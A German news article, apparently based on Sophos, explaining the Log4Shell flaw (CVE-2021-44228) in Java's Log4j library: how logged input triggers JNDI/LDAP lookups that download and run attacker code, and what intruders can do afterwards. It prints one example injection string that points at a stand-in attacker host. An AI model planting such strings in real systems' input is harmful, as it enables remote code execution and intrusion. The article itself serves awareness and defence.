Sophos erläutert neue Schwachstelle Log4Shell

Zero-Day-Schwachstelle bedroht Server weltweit

Security
© Wolfgang Traub

Nach prominenten Zero-Day-Schwachstellen wie Hafnium, Kaseya oder Solarwinds müssen sich Unternehmen nun dringend mit einer Server-Schwachstelle namens Log4Shell auseinandersetzen. Sophos klärt die wichtigsten Fakten und sagt, was zu tun ist.

Der Name Log4Shell bezieht sich auf die Tatsache, dass der ausgenutzte Fehler in einer beliebten Java-Code-Bibliothek namens Log4j (Logging for Java) enthalten ist, und darauf, dass Angreifer, wenn sie die Lücke erfolgreich ausnutzen, praktisch eine Shell erhalten – also die Möglichkeit, jeden Systemcode ihrer Wahl auszuführen.

Und als ob diese Kommandogewalt noch nicht genug wäre, erfolgte ein Tweet der Sicherheitslücke als Zero-Day-Lücke, also als Sicherheitsfehler, der dokumentiert ist, bevor ein Patch zur Verfügung steht. Zudem ist der Proof of Concept (PoC) auf GitHub öffentlich und das Problem damit weltweit bekannt, während es noch ungepatcht war. Entsprechend laut läuten seit Freitag weltweit die Alarmglocken, und in Deutschland hat das BSI die Warnstufe Rot ausgerufen.

Die Schwachstelle, mittlerweile offiziell als CVE-2021-44228 bekannt, hat ihren Ursprung in einer harmlosen Anfrage an einen anfälligen Server, die einige Daten – beispielsweise einen HTTP-Header – einschließt, von denen die Cyberkriminellen erwarten (oder sogar wissen), dass der Server sie in seine Log-Datei schreibt. Die so eingeschleusten Daten bilden eine versteckte „Sprengfalle“, da der Server, während er die Daten in ein für die Protokollierung geeignetes Format umwandelt, einen Web-Download als integralen Bestandteil der Erstellung des erforderlichen Protokolleintrags startet. Und diese Aktion hat es in sich, denn wenn die zurückkommenden Daten ein gültiges Java-Programm sind (eine .class-Datei), führt der Server diese Datei aus, um ihm bei der Generierung der Protokolldaten zu helfen.

Der Trick besteht darin, dass ungepatchte Versionen der Log4j-Bibliothek standardmäßig Protokollierungsanforderungen ermöglichen, um allgemeine LDAP-Suchen sowie verschiedene andere Online-Suchen auszulösen. Diese Funktion existiert, um dabei zu helfen, nicht sehr nützliche Daten, zum Beispiel Benutzer-IDs wie OZZJ5JYPVK, in menschenlesbare Informationen umzuwandeln, beispielsweise Peter Müller. Diese Anfragen erfolgen über ein häufig verwendetes Java-Tool-Kit namens JNDI (Java Naming and Directory Interface).

Dieses Vorgehen ist so lange tragbar, wie die protokollierten Daten, die eine Ausführung von Server-seitigem Code auslösen können, auf Verzeichnis-Server im eigenen Netzwerk beschränkt sind. Allerdings sind viel Server nicht entsprechend eingerichtet, und so könnten bösartige „Logsploiter“ versuchen, Text wie {$jndi:ldap://dodgy.example:389/badcode} in die Daten einzubetten, von denen sie erwarten, dass Unternehmen sie protokollieren und Server dabei automatisch

  • JNDI verwenden, um eine LDAP-Anfrage an den angegebenen Port auf dem angegebenen nicht vertrauenswürdigen externen Server zu senden.
  • den nicht vertrauenswürdigen Inhalt in den Standort Badcode abrufen.
  • den vom Angreifer bereitgestellten Code ausführen, um „Hilfe“ bei der Protokollierung zu erhalten.

Dieses Vorgehen wird im Fachjargon als nicht authentifizierte Remote Code Execution (RCE) bezeichnet. Ohne sich anzumelden oder ein Passwort oder Zugriffstoken zu benötigen, könnten Kriminelle eine harmlos aussehende Anfrage verwenden, um Server dazu zu bringen, sich zu melden, ihren Code herunterzuladen und sich so mit ihrer Malware zu infizieren. Je nachdem, welche Zugriffsrechte ein Server auf das interne Netzwerk hat, kann eine solche RCE Kriminellen dabei helfen, eine Vielzahl schädlicher Aufgaben auszuführen.

Und genau das macht die aktuelle Schachstelle Log4Shell so gefährlich. Angreifer können theoretisch Daten vom Server abfließen lassen, Details über das interne Netzwerk erfahren, Daten auf dem Server ändern oder auch Daten von anderen Servern im Netzwerk exfiltrieren. Kriminelle können außerdem zusätzliche Hintertüren auf dem Server oder im Netzwerk für zukünftige Angriffe einrichten oder weitere Malware wie Netzwerk-Snooper, Memory Scraper, Data Stealer und Cryptominer installieren.


  1. Zero-Day-Schwachstelle bedroht Server weltweit
  2. Was ist zu tun?

Verwandte Artikel

Sophos GmbH

Schwachstellen-Management

Schwachstelle